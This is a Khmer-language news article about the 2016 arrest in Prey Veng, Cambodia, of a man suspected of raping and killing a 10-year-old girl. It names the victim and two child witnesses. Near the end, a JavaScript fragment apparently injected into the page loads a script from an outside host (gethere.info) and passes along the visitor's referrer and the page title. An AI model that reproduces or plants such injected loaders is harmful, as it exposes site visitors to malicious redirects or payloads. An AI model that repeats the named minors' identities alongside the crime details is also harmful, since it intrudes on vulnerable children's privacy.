ព្រឹតិ្តការណ៍ថ្មីៗ

ជនសង្ស័យរំលោភសម្លាប់កុមារីអាយុ១០ឆ្នាំ ត្រូវកម្លាំងសមត្ថកិច្ចព្រៃវែងឃាត់ខ្លួន

1 ឆ្នាំ មុន 2 តូ សុផល

ខេត្តព្រៃវែង៖ កាលពីថ្ងៃទី០៧ ខែ មិថុនា ឆ្នាំ ២០១៦ វេលាម៉ោង ១៤ និង ១៥ នាទី នៅចំនុច វាលព្រៃខាងកើតភូមិខ្យោកកណ្តាល ឃុំពពឺស ស្រុកស្វាយអន្ទរចំងាយ ២០០ម មានកើត ករណីរំលោភសំលាប់ ក្មេងស្រី ឈ្មោះចាន់ សុឃីម អាយុ១០ ឆ្នាំ នៅចំនុចព្រៃចំការ ម្ចាស់ឈ្មោះ តាគ្រី ស្តិតនៅខាងកើតភូមិ ខ្យោក កណ្តាលចំងាយ ២០០ម។

ក្រោយទទួលបានដំណឹងមានករណី រំលោភសំលាប់ លោក ឧត្តមសេនីយ៍ ស្រេង ជា បានបញ្ជាឲ្យការិយាល័យ ជំនាញ និងកម្លាំងអធិការនគរបាលស្រុក ចុះស្រាវជ្រាវជាបន្ទាន់  ដឹកនាំដោយ វរសេនីយ៍ទោ អ៊ុង ផាន អធិការ   និង ជាប្រធានការិយាល័យ  ព្រហ្មទណ្ឌកំរិតស្រាល បានចុះ ធ្វើការស្រាវជ្រាវភ្លាមៗ ហើយបានកំណត់មុខសញ្ញា បាន និង ឃាត់ខ្លួនមនុស្ស១ នាក់ ឈ្មោះ ឈ្មោះ ទ្រី   គឹម ឈាង ភេទ ប្រុស អាយុ ៣០ឆ្នាំ នៅចំនុច វាសស្រែ ខាងលិច ភូមិខ្យោក កណ្តាល ឃុំ ពពឹស នៅវេលាម៉ោង ១៥ និង ៤៥ នាទី ។

ក្នុងហេតុការណ៍នេះលោកវរសេនីយ៍ទោ អ៊ុង ផាន អធិការបានឲ្យដឹកថា ក្រោយ បានទទួលពាក្យបណ្តឹងតាម រយៈទូរសព្ទ័ដៃ ពីឈ្មោះ ព្រឹម វណ្ណ ភេទប្រុស អាយុ៤៧ ឆ្នាំ ត្រូវជាឪពុកជនរងគ្រោះបានប្តឹង និងបទបញ្ជា លោក ឧត្តមសេនីយ៍ ស្រេង ជា ស្នងការ  មានករណីរំលោភសំលាប់ កូនស្រីរបស់ខ្លួន នៅចំនុចវាល ព្រៃខាងកើតភូមិ ខ្យោក  កណ្តាល ឃុំ ពពឺស ស្រុក ស្វាយអន្ទរ ចំងាយ ២០០ម ពីភូមិ ។

ដោយមានការបំភ្លឺពីប្អូនស្រីរបស់ ឈ្មោះចាន់ ពៅ អាយុ ០៤ ឆ្នាំ បានបំភ្លឺថា ឈ្មោះទ្រី  គឹម ឈាង ភេទ ប្រុស  អាយុ ៣០ ឆ្នាំ ភូមិ ខ្យោកកណ្តាល ឃុំពពឺស ថាបានបបួលបងស្រីរបស់ខ្លួនទៅរកឃ្មុំ នៅព្រៃខាងកើត ភូមិ ដោយ មានការបំភ្លឺពី ឈ្មោះភុន ដេវីត ភេទ ប្រុសអាយុ ១៣ ឆ្នាំ នៅភូមិជាមួយជនសង្ស័យបានឆ្លើយថា ខ្លួនបានឃើញ ឈ្មោះទ្រី គឹមឈាង ដើរទៅជាមួយជនរងគ្រោះ ទៅទិសខាងកើតភូមិខ្យោក កណ្តាល លុះដល់ ម៉ោង១៥  ក្រុម គ្រួសារជនរងគ្រោះ បានរកឃើញជនរងគ្រោះ ត្រូវស្លាប់ ដោយផ្អែកលើកសាក្សី ទាំងពីរ សមត្ថ កិច្ចក៍បានឈាន ទៅកំណត់មុខសញ្ញា ឈ្មោះ ទ្រី គឹមឈាង ភេទ ប្រុស អាយុ ៣០ ឆ្នាំ ឃាត់ខ្លួន ដើម្បីធ្វើការសាកវសួរ ក្រោយពី បានធ្វើការសាកសួររួចមក ជនសង្ស័យ បានសារភាពថាៈ ខ្លួនពិតជានចាប់រំលោភហើយច្រប៉ាច់ ក សំលាប់ កុមារី រងគ្រោះ ឈ្មោះចាន់ សុឃីម ពិតប្រាកដម៉ែន។

បច្ចុប្បន្ន ជនសង្ស័យត្រូវបានឃាតខ្នួននៅអធិការដ្ឋាននគរបាលស្រុកស្វាយអន្ទរដើម្បី បំពេញសំណុំបែបបទ បញ្ជូនទៅសាលាដំបូងខេត្តដើម្បីចាត់ការតាមនីតិវិធីច្បាប់។

ចំណែកសាកសព្វកុមារីរងគ្រោះត្រូវបានប្រគល់ជូនក្រុមគ្រួសារយកទៅធ្វើបុណ្យតាមប្រពៃណី៕

11872305_10153513108267508_7760316066293043812_o

03d43255-7389-448c-8e26-0b7ff3be0d42 4ae18eca-16b4-46fb-8ab9-4bb501f94b5b 7d223f65-e687-41a5-a1ef-4d9fc929b0a6 26f7122e-773d-411b-bf3c-6b8a32a4cf98 89e8665c-3098-449f-8090-b14189d4d327s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ